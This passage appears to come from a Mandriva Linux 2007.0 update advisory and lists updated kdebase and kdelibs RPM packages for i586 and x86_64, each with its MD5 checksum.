2007.0/i586/kdelibs-common-3.5.4-19.6mdv2007.0.i586.rpm 36aa12ce60ac93de04d83ac57442936a 2007.0/i586/kdelibs-devel-doc-3.5.4-19.6mdv2007.0.i586.rpm de1847cd72bde5c8dd80e8f14572fe80 2007.0/i586/libkdebase4-3.5.4-35.4mdv2007.0.i586.rpm e915e0a2dbd46e282455a954f50304f2 2007.0/i586/libkdebase4-devel-3.5.4-35.4mdv2007.0.i586.rpm 21f5424cdd6890031bf3b75fac781592 2007.0/i586/libkdebase4-kate-3.5.4-35.4mdv2007.0.i586.rpm caafc7ceefbee5c1874f9227906eb737 2007.0/i586/libkdebase4-kate-devel-3.5.4-35.4mdv2007.0.i586.rpm f94cf0e9d38eb3b4ed0dd6e3e3929db9 2007.0/i586/libkdebase4-kmenuedit-3.5.4-35.4mdv2007.0.i586.rpm 4332d3646a91ee5016fc9a86edbf1d69 2007.0/i586/libkdebase4-konsole-3.5.4-35.4mdv2007.0.i586.rpm 2ef7da707ec19c64e7fc6114ae4839a7 2007.0/i586/libkdecore4-3.5.4-19.6mdv2007.0.i586.rpm 6217412db42f4e638af260110843aab7 2007.0/i586/libkdecore4-devel-3.5.4-19.6mdv2007.0.i586.rpm f0d0e9ed46e922b25739f3d2f990c18d 2007.0/SRPMS/kdebase-3.5.4-35.4mdv2007.0.src.rpm fa06b932bbbf7b55d2e15e5b36c670bb 2007.0/SRPMS/kdelibs-3.5.4-19.6mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: e1a881a693ff5f7d7e2cfe2c344b81c5 2007.0/x86_64/kdebase-3.5.4-35.4mdv2007.0.x86_64.rpm 14b14442fa9874636cc98a80c42cffa3 2007.0/x86_64/kdebase-common-3.5.4-35.4mdv2007.0.x86_64.rpm c74ea565694a82cbc60a5b4dbdbf662f 2007.0/x86_64/kdebase-kate-3.5.4-35.4mdv2007.0.x86_64.rpm 056630a84e60d704647b1879ce2b2d83 2007.0/x86_64/kdebase-kdeprintfax-3.5.4-35.4mdv2007.0.x86_64.rpm 3c5bb19d5b46152c72c508b0c08c7a1a 2007.0/x86_64/kdebase-kdm-3.5.4-35.4mdv2007.0.x86_64.rpm 66ffc262e1c6d7140ba5db7507c57b6e 2007.0/x86_64/kdebase-kmenuedit-3.5.4-35.4mdv2007.0.x86_64.rpm 5592b8106391f9d2afbd8882d977bb56 2007.0/x86_64/kdebase-konsole-3.5.4-35.4mdv2007.0.x86_64.rpm da3cd3792e29b1ecfba782337d23adb5 2007.0/x86_64/kdebase-nsplugins-3.5.4-35.4mdv2007.0.x86_64.rpm b50d99eaf3e8cd64f5f8e1cf2122595c 2007.0/x86_64/kdebase-progs-3.5.4-35.4mdv2007.0.x86_64.rpm e17925ebddeb5ddc8fa38839fb2828a3 2007.0/x86_64/kdelibs-common-3.5.4-19.6mdv2007.0.x86_64.rpm 25db4c696fb6fa7a2982e4a9ae48aba7 2007.0/x86_64/kdelibs-devel-doc-3.5.4-19.6mdv2007.0.x86_64.rpm 86cce76d83cb7676c2db63e6aaa3084b 2007.0/x86_64/lib64kdebase4-3.5.4-35.4mdv2007.0.x86_64.rpm a22a5a0c6ec25aa3fbf10359dbbe99d2 2007.0/x86_64/lib64kdebase4-devel-3.5.4-35.4mdv2007.0.x86_64.rpm ebc27724629079d3f31de145dd245abd 2007.0/x86_64/lib64kdebase4-kate-3.5.4-35.4mdv2007.0.x86_64.rpm aae886b51f20df9266371e6d6bf6703a
